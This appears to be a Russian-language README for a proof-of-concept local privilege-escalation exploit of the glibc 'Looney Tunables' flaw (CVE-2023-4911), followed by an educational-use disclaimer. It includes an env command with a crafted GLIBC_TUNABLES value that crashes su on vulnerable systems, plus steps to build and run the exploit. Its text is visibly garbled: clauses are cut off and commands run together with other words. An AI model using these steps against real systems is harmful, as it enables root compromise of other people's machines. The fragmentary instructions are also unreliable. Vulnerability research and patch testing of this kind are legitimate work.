
Это PoC уязвимости CVE-2023-4911 (также известной как "Looney Tunables"), эксплуатирующей ошибку в функции parse_tunables() динамического загрузчика glibc, которая обрабатывает переменную окружения GLIBC_TUNABLES.
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped), то имеем дело с уязвимой целью.libc.so.6python3 libc.py
gcc exp.c -o exp
Весь код, предоставленный в этом репозитории, предназначен исключительно для образовательных/исследовательских целей. Любые действия и/или мероприятия, связанные с материалом, содержащимся в этом репозитории, осуществляются исключительно на ваш страх и риск. Неправильное использование кода из этого репозитория может привести к уголовному преследованию лиц, причастных к этому. Автор не несет ответственности в случае возбуждения уголовного дела против лиц, неправильно использующих код из этого репозитория для нарушения закона.